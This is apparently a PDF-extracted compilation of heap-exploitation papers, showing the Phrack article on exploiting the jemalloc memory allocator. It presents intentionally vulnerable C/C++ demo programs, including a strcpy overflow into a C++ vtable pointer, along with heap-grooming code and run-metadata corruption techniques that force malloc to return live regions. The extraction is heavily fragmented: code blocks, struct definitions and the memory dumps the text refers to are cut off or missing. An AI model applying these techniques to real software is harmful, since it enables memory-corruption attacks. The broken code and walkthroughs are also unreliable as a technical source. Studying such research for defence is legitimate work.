Heap Hacking
Heap Hacking
Contents
1. Pseudomonarchia jemallocum – argp, huku ....................................................................................... 3
2. The House Of Lore: Reloaded - blackngel ......................................................................................... 53
3. Malloc des-maleficarum - blackngel.................................................................................................. 99
4. Yet another free() exploitation technique - huku ........................................................................... 145
5. The use of set_head to defeat the wilderness – g463 .................................................................... 169
6. OS X heap exploitation techniques - nemo ..................................................................................... 209
7. Advanced Doug lea's malloc exploits - jp ........................................................................................ 227
8. The Malloc Maleficarum - Phantasmal Phantasmagoria ................................................................ 269
9. Exploiting The Wilderness - Phantasmal Phantasmagoria .............................................................. 288
1. Pseudomonarchia jemallocum – argp, huku
==Phrack Inc.==
|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ argp | huku ]=------------------------=|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
2.1 - Basic structures
2.1.1 - Chunks (arena_chunk_t)
2.1.2 - Arenas (arena_t)
2.1.3 - Runs (arena_run_t)
2.1.4 - Regions/Allocations
2.1.5 - Bins (arena_bin_t)
2.1.6 - Huge allocations
2.1.7 - Thread caches (tcache_t)
2.1.8 - Unmask jemalloc
2.2 - Algorithms
3 - Exploitation tactics
3.1 - Adjacent region corruption
3.2 - Heap manipulation
3.3 - Metadata corruption
3.3.1 - Run (arena_run_t)
3.3.2 - Chunk (arena_chunk_t)
3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code
--[ 1 - Introduction
All the above have led to a few versions of jemalloc that are very
[
1. Pseudomonarchia jemallocum – argp, huku]
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.
There are so many different jemalloc versions that we almost went crazy
double checking everything in all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.
Page 4
[
1. Pseudomonarchia jemallocum – argp, huku]
algorithm. For the later two cases, the association between a thread
and an arena doesn't stay the same for the whole life of the thread.
Chunk #0 Chunk #1
.--------------------------------. .--------------------------------.
| | | |
| Run #0 Run #1 | | Run #0 Run #1 |
| .-------------..-------------. | | .-------------..-------------. |
| | || | | | | || | |
| | Page || Page | | | | Page || Page | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | | | || | | | | | | | | || | | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
| | | |
| | | |
.---|-----|----------. .---|-----|----------.
| | | | | | | |
| free regions' tree | ... | free regions' tree | ...
| | | |
`--------------------' `--------------------'
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
Page 5
[
1. Pseudomonarchia jemallocum – argp, huku]
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design, that is the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.
The following are the chunk sizes in the jemalloc variants we have
examined:
+---------------------------------------+
| jemalloc variant | Chunk size |
+---------------------------------------+
| FreeBSD 8.2-RELEASE | 1 MB |
-----------------------------------------
| Standalone v2.2.3 | 4 MB |
-----------------------------------------
| jemalloc_linux_20080828a | 1 MB |
-----------------------------------------
| Mozilla Firefox v5.0 | 1 MB |
-----------------------------------------
| Mozilla Firefox v7.0.1 | 1 MB |
-----------------------------------------
| Mozilla Firefox v11.0 | 1 MB |
-----------------------------------------
An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.
+-------------------------------------------------------------------------+
| Chunk alignment | Chunk content |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [ Arena ]
| Chunk #2 starts at: 0xb7400000 [ Arena ]
| Chunk #3 starts at: 0xb7800000 [ Arena ]
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
| Chunk #6 starts at: 0xb8400000 [ Arena ]
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
| Chunk #9 starts at: 0xb9000000 [ Arena ]
+-------------------------------------------------------------------------+
Huge allocation regions are memory regions managed by jemalloc chunks that
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
also has the small/medium and large size classes for end user allocations
(both managed by arenas). We analyze jemalloc's size classes of regions in
subsection 2.1.4.
Page 6
[
1. Pseudomonarchia jemallocum – argp, huku]
[2-1]
/*
* Whether this chunk contained at some point one or more dirty pages.
*/
bool dirtied;
/*
* A chunk map element corresponds to a page of this chunk. The map
* keeps track of free and large/small regions.
*/
arena_chunk_map_t map[];
};
The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).
Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:
Page 7
[
1. Pseudomonarchia jemallocum – argp, huku]
[2-2]
/*
* Chunks that contain dirty pages managed by this arena. When jemalloc
* requires new pages these are allocated first from the dirty pages.
*/
ql_head(arena_chunk_t) chunks_dirty;
/*
* Each arena has a spare chunk in order to cache the most recently
* freed chunk.
*/
arena_chunk_t *spare;
/*
* Ordered tree of this arena's available clean runs, i.e. runs
* associated with clean pages.
*/
arena_avail_tree_t runs_avail_clean;
/*
* Ordered tree of this arena's available dirty runs, i.e. runs
* associated with dirty pages.
*/
arena_avail_tree_t runs_avail_dirty;
/*
* Bins are used to store structures of free regions managed by this
* arena.
*/
arena_bin_t bins[];
};
Page 8
[
1. Pseudomonarchia jemallocum – argp, huku]
arena_t **arenas;
unsigned narenas;
The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (however
within the small and large size classes as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:
[2-3]
/*
* The index of the next region of the run that is free. On the FreeBSD
* and Firefox flavors of jemalloc this variable is named regs_minelm.
*/
uint32_t nextind;
/*
* Bitmask for the regions in this run. Each bit corresponds to one
Page 9
[
1. Pseudomonarchia jemallocum – argp, huku]
* region. A 0 means the region is used, and an 1 bit value that the
* corresponding region is free. The variable nextind (or regs_minelm
* on FreeBSD and Firefox) is the index of the first non-zero element
* of this array.
*/
unsigned regs_mask[];
};
In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.
Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).
Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
global to the allocator red-black tree and they have their own dedicated
and contiguous chunks. Large regions have their own runs, that is each
large allocation has a dedicated run. Their metadata are situated on
the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.
In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.
Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin
may be associated with several runs, however a specific run can only be
associated with a specific bin, i.e. there is an one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.
Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.
Page
10
[
1. Pseudomonarchia jemallocum – argp, huku]
[2-4]
/*
* The current run of the bin that manages regions of this bin's size
* class.
*/
arena_run_t *runcur;
/*
* The tree of the bin's associated runs (all responsible for regions
* of this bin's size class of course).
*/
arena_run_tree_t runs;
/*
* The total size of a run of this bin. Remember that each run may be
* comprised of more than one pages.
*/
size_t run_size;
/*
* The total number of elements in the regs_mask array of a run of this
* bin. See 2.1.3 for more information on regs_mask.
*/
uint32_t regs_mask_nelms;
/*
* The offset of the first region in a run of this bin. This can be
* non-zero due to alignment requirements.
*/
uint32_t reg0_offset;
};
one = malloc(2);
two = malloc(8);
three = malloc(16);
Page
11
[
1. Pseudomonarchia jemallocum – argp, huku]
Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).
Page
12
[
1. Pseudomonarchia jemallocum – argp, huku]
.----------------------------------. .---------------------------.
.----------------------------------. | +--+-----> arena_chunk_t |
.---------------------------------. | | | | |
| arena_t | | | | | .---------------------. |
| | | | | | | | |
| .--------------------. | | | | | | arena_run_t | |
| | arena_chunk_t list |-----+ | | | | | | | |
| `--------------------' | | | | | | | .-----------. | |
| | | | | | | | | page | | |
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
| .------------------------. | | | | | | | | region | | |
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
| `------------------------' | | |.' | | | | region | | |
| | | |.' | | | +-----------+ | |
`-----+----------------------+----' | | | | region | | |
| | | | | +-----------+ | |
| | | | | . . . | |
| v | | | .-----------. | |
| .-------------------. | | | | page | | |
| | .---------------. | | | | +-----------+ | |
| | | arena_chunk_t |-+---+ | | | region | | |
| | `---------------' | | | +-----------+ | |
| [2-5] | .---------------. | | | | region | | |
| | | arena_chunk_t | | | | +-----------+ | |
| | `---------------' | | | | region | | |
| | . . . | | | +-----------+ | |
| | .---------------. | | | | |
| | | arena_chunk_t | | | `---------------------' |
| | `---------------' | | [2-6] |
| | . . . | | .---------------------. |
| `-------------------' | | | |
| +----+--+---> arena_run_t | |
| | | | | |
+----------+ | | | .-----------. | |
| | | | | page | | |
| | | | +-----------+ | |
| | | | | region | | |
v | | | +-----------+ | |
.--------------------------. | | | | region | | |
| arena_bin_t | | | | +-----------+ | |
| bins[0] (size 8) | | | | | region | | |
| | | | | +-----------+ | |
| .----------------------. | | | | . . . | |
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
| `----------------------' | | | | page | | |
`--------------------------' | | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | |
| `---------------------' |
`---------------------------'
Page
13
[
1. Pseudomonarchia jemallocum – argp, huku]
Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that
are ordered in a global red black tree which is common to all threads.
[2-7]
/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
#ifdef MALLOC_DSS
/* Linkage for the size/address-ordered tree. */
rb_node(extent_node_t) link_szad;
#endif
malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);
The most interesting thing about huge allocations is the fact that free
base nodes are kept in a simple array of pointers called 'base_nodes'. The
aforementioned array, although defined as a simple pointer, it's handled
as if it was a two dimensional array holding pointers to available base
nodes.
Page
14
[
1. Pseudomonarchia jemallocum – argp, huku]
static extent_node_t *
base_node_alloc(void)
{
extent_node_t *ret;
malloc_mutex_lock(&base_mtx);
if (base_nodes != NULL) {
ret = base_nodes;
base_nodes = *(extent_node_t **)ret;
...
}
...
}
static void
base_node_dealloc(extent_node_t *node)
{
malloc_mutex_lock(&base_mtx);
*(extent_node_t **)node = base_nodes;
base_nodes = node;
...
}
1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.
Page
15
[
1. Pseudomonarchia jemallocum – argp, huku]
void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
...
In this section we will analyze thread magazines, but the exact same
principles apply on the tcaches (the change in the nomenclature is probably
the most notable difference between them).
The following figure depicts the relationship between the various thread
magazines' structures.
Page
16
[
1. Pseudomonarchia jemallocum – argp, huku]
.-------------------------------------------.
| mag_rack_t |
| |
| bin_mags_t bin_mags[]; |
| |
| .-------------------------------------. |
| | bin_mags[0] ... bin_mags[nbins - 1] | |
| `-------------------------------------' |
`--------|----------------------------------'
|
| .------------------.
| +----------->| mag_t |
v | | |
.----------------------. | | void *rounds[] |
| bin_mags_t | | | ... |
| | | `------------------'
| .----------------. | |
| | mag_t *curmag; |-----------+
| `----------------' |
| ... |
`----------------------'
/*
* Magazines are lazily allocated, but once created, they remain until the
* associated mag_rack is destroyed.
*/
typedef struct bin_mags_s bin_mags_t;
struct bin_mags_s {
mag_t *curmag;
mag_t *sparemag;
};
Page
17
[
1. Pseudomonarchia jemallocum – argp, huku]
void
mag_load(mag_t *mag)
{
arena_t *arena;
arena_bin_t *bin;
arena_run_t *run;
void *round;
size_t i;
if (round == NULL)
break;
...
mag->nrounds = i;
}
/* Just return the next available void pointer. It points to one of the
* preallocated memory regions.
*/
void *
mag_alloc(mag_t *mag)
{
if (mag->nrounds == 0)
return (NULL);
mag->nrounds--;
return (mag->rounds[mag->nrounds]);
}
Page
18
[
1. Pseudomonarchia jemallocum – argp, huku]
The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying around normal memory regions.
As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py. The following is a sample run of
the script on Firefox 11.0 on Linux x86 (edited for readability):
$ ./firefox-bin &
Page
19
[
1. Pseudomonarchia jemallocum – argp, huku]
Page
20
[
1. Pseudomonarchia jemallocum – argp, huku]
$ open firefox-11.0.app
...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc
Page
21
[
1. Pseudomonarchia jemallocum – argp, huku]
MALLOC(size):
IF size CAN BE SERVICED BY AN ARENA:
IF size IS SMALL OR MEDIUM:
bin = get_bin_for_size(size)
Page
22
[
1. Pseudomonarchia jemallocum – argp, huku]
bit = get_first_set_bit(run->regs_mask)
region = get_region(run, bit)
CALLOC(n, size):
RETURN MALLOC(n * size)
FREE(addr):
IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
IF addr IS A SMALL ALLOCATION:
run = get_run_addr_belongs_to(addr);
bin = run->bin;
size = bin->reg_size;
element = get_element_index(addr, run, bin)
unset_bit(run->regs_mask[element])
Page
23
[
1. Pseudomonarchia jemallocum – argp, huku]
abstractly and identify primitives that can applied to new targets. We have
used this approach before, comparing FreeBSD and Linux kernel heap
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
corruption, heap manipulation and metadata corruption exploitation
primitives.
The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
[3-1]
[3-2]
free(one);
Page
24
[
1. Pseudomonarchia jemallocum – argp, huku]
free(two);
free(three);
[3-3]
Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').
At breakpoint [3-1]:
At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:
Page
25
[
1. Pseudomonarchia jemallocum – argp, huku]
After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.
We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).
Page
26
[
1. Pseudomonarchia jemallocum – argp, huku]
class base
{
private:
char buf[32];
public:
void
copy(const char *str)
{
strcpy(buf, str);
}
virtual void
print(void)
{
printf("buf: 0x%08x: %s\n", buf, buf);
}
};
void
print(void)
{
printf("[+] derived_a: ");
base::print();
}
};
void
print(void)
{
printf("[+] derived_b: ");
base::print();
}
};
int
main(int argc, char *argv[])
{
base *obj_a;
base *obj_b;
Page
27
[
1. Pseudomonarchia jemallocum – argp, huku]
if(argc == 3)
{
printf("[+] overflowing from obj_a into obj_b\n");
obj_a->copy(argv[1]);
obj_b->copy(argv[2]);
obj_a->print();
obj_b->print();
return 0;
}
$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040
At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':
Now it must be clear why even though the declared buffer is 32 bytes long,
there are 36 bytes allocated for the object. Exactly the same as above
happens with the second 'new' call, but this time the VPTR points to
'obj_b' (which is at 0xb7c01070):
Page
28
[
1. Pseudomonarchia jemallocum – argp, huku]
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:
Page
29
[
1. Pseudomonarchia jemallocum – argp, huku]
The following step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
state we have arranged, jemalloc to place the vulnerable objects in holes
on the target run overflowing into the victim objects.
char *foo[NALLOC];
char *bar[NALLOC];
Page
30
[
1. Pseudomonarchia jemallocum – argp, huku]
jemalloc's behavior can be observed in the output, remember that our target
size class is 16 bytes:
$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]: 0x40201030
foo[1]: 0x40201040
foo[2]: 0x40201050
foo[3]: 0x40201060
foo[4]: 0x40201070
foo[5]: 0x40201080
foo[6]: 0x40201090
foo[7]: 0x402010a0
...
foo[447]: 0x40202c50
foo[448]: 0x40202c60
foo[449]: 0x40202c70
foo[450]: 0x40202c80
foo[451]: 0x40202c90
foo[452]: 0x40202ca0
foo[453]: 0x40202cb0
foo[454]: 0x40202cc0
foo[455]: 0x40202cd0
foo[456]: 0x40202ce0
foo[457]: 0x40202cf0
foo[458]: 0x40202d00
foo[459]: 0x40202d10
foo[460]: 0x40202d20
...
Page
31
[
1. Pseudomonarchia jemallocum – argp, huku]
We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can he help us place our data in a predictable way.
Page
32
[
1. Pseudomonarchia jemallocum – argp, huku]
For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly, instead, jemalloc will first find
the run the memory to be freed is located and will then dereference the
bin pointer stored in the run's header. From function 'arena_dalloc_small':
On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' return an already allocated region.
Page
33
[
1. Pseudomonarchia jemallocum – argp, huku]
Let's first have a look at how the in-memory model of a run looks like
(file test-run.c):
char *first;
breakpoint();
free(first);
The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.
Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).
Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.
Page
34
[
1. Pseudomonarchia jemallocum – argp, huku]
In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x20);
memset(three, 0x43, 0x20);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
__asm__("int3");
__asm__("int3");
At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:
gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Page
35
[
1. Pseudomonarchia jemallocum – argp, huku]
We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?
A careful reader would have already thought the obvious; one can overwrite
the 'bin' pointer to make it point to a fake bin structure of his own.
Well, this is not a good idea because of two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).
if(argc < 2)
{
printf("%s <offset>\n", argv[0]);
return 0;
}
Page
36
[
1. Pseudomonarchia jemallocum – argp, huku]
...
i = run->regs_minelm;
mask = run->regs_mask[i]; /* [3-4] */
if (mask != 0) {
/* Usable allocation found. */
bit = ffs((int)mask) - 1; /* [3-5] */
...
return (ret);
}
Page
37
[
1. Pseudomonarchia jemallocum – argp, huku]
...
}
~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040
Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)
Page
38
[
1. Pseudomonarchia jemallocum – argp, huku]
Before continuing with our analysis, let's set the foundations of the
test case we will cover.
[[Arena #1 header][R...R][C...C]]
The low level function responsible for allocating memory pages (called
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.
p1 = (char *)malloc(16);
Page
39
[
1. Pseudomonarchia jemallocum – argp, huku]
/* [3-8] */
print_arena_chunk(base2);
/* [3-9] */
/* Allocate one more region right after the first region of the
* new chunk. This is done for demonstration purposes only.
*/
p2 = malloc(16);
/* [3-10] */
if(argc > 1) {
if((fd = open(argv[1], O_RDONLY)) > 0) {
/* Read the contents of the given file. We assume this file
* contains the exploitation vector.
*/
memset(buffer, 0, sizeof(buffer));
l = read(fd, buffer, sizeof(buffer));
close(fd);
/* [3-11] */
Page
40
[
1. Pseudomonarchia jemallocum – argp, huku]
*/
free(p2);
print_region(first, 16);
/* [3-12] */
/* [3-13] */
Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is actually
split in 6 parts which can be distinguished by their corresponding '[3-x]'
tags. Briefly, in part [3-8], the vulnerable program performs a number
of allocations in order to fill up the available space served by the
first arena. This emulates the fact that an attacker somehow controls
the order of allocations and deallocations on the target, a fair and
very common prerequisite. Additionally, the last call to 'malloc()'
(the one before the while loop breaks) forces jemalloc to allocate a new
arena chunk and return the first available memory region. Part [3-9],
performs one more allocation, one that will lie next to the first (that
is the second region of the new arena). This final allocation is there
for demonstration purposes only (check the comments for more details).
